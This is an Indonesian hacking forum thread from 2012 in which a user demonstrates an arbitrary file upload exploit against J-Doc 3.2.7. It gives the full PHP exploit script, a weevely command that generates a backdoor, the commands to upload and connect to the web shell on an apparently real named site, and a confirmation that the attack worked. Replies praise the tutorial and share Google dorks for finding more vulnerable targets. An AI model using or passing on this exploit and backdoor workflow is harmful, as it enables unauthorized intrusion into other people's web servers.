+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html)
+----- Thread: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) (/thread-3561.html)
J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - nasa - 08-26-2012
sebelumnya ane yang pengguna baru ini mw minta ijin buat share gimana cara menggunakan salah satu webapp/0day arbitrary file upload yg ada di http://1337day.com/exploits/19162, thread ini ane buat karena banyak yg sering pm di fb nanyain ttg 1337day.com, di sini ane hanya ngasih contoh salah satu exploit yg paling mudah yaitu arbitrary file upload.
arbitrary file upload maksudnya bahwa seorang attacker dapat mengupload file tertentu ke webserver target misalnya shell php.
persiapan yang ane lakuin:
1. generate php backdoor dengan weevely dengan password admin dan di simpan di directory /root dengan nama tes.php
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate admin /root/tes.php2. download file exploit di http://1337day.com/exploits/19162 kemudian ane save dengan nama jdoc.php di folder /root
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site:
// The vulnerable website
$base_url = 'http://localhost/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'info.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
if (curl_exec($curl)) {
echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
die('error in the exploit');
}
# 1337day.com [2012-08-10]
?>3. setelah googling dengan dork yg ditulis di file exploit ane coba dgn target : http://www.proges.cfiparis.com/jdoc/
4. edit file jdoc.php dengan mengganti isi dari variabel $base_url dengan web target dan variabel $file_to_upload dengan back door yg telah di generate dengan weevely tdi. sehingga file jdoc.php menjadi :
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site:
// The vulnerable website
$base_url = 'http://www.proges.cfiparis.com/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'tes.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
if (curl_exec($curl)) {
echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
die('error in the exploit');
}
# 1337day.com [2012-08-10]
?>5. jalankan file exploit :
Code:
root@bt:~# php jdoc.php6. setelah itu ane coba konek ke target dengan weevely :
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://www.proges.cfiparis.com/jdoc/divers/tes.php admin7. ternyata berhasil langsung ane jalanin module
ystem.info ternyata server windows ....screen shot:
![[Image: jdoc.jpg]](http://i1112.photobucket.com/albums/k498/koteka_baliem/jdoc.jpg)
terima kasih buat para momod yg udah ngijinin ane buat nulis artikel ini,
viva la backtrack ...
nb: script ini bisa running klo php5-curl udah terinstall, di sini ane make BT 5 R3 dan ternyata error saat ane jalanin, cba perintah apt-get install php5-curl ternyata ga bisa juga, jadi ane download file deb di http://www.ubuntuupdates.org/package/core/lucid/main/security/php5-curl trus di install manual ..
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Al - Ayyubi - 08-26-2012
thk's om nasa tutornya
ikutan nyoba ya om tar kalo bermasalah aku balik lagi
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - bunglonhijau - 08-26-2012
wew.. mantap om.. +1
sangat bermanfaat..
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - iKONspirasi - 08-26-2012
mantab om nasa, banyak emang yg tanya gmn cara pake 1337day.com hehehe
skrg udah ada contohnya
+1 dari ane
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Udalah - 08-27-2012
thanks om nasa berguna banget
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - alkaaf - 08-27-2012
om, bisa bagi2 dork nya om?
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Udalah - 08-27-2012
(08-27-2012, 05:08 AM)alkaaf Wrote: om, bisa bagi2 dork nya om?
coba ini om
Quote:inurl:jdoc
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - iKONspirasi - 08-27-2012
(08-27-2012, 05:08 AM)alkaaf Wrote: om, bisa bagi2 dork nya om?
bukannya di l337day.com nya ada tuh:
Code:
intext:"Système de partage de documents par Projet"ane coba bahasanya prancis semua
RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - alkaaf - 08-27-2012
oke lah :d, jmpol bwt yg jwb. Eh jempolnya dimana yah? :d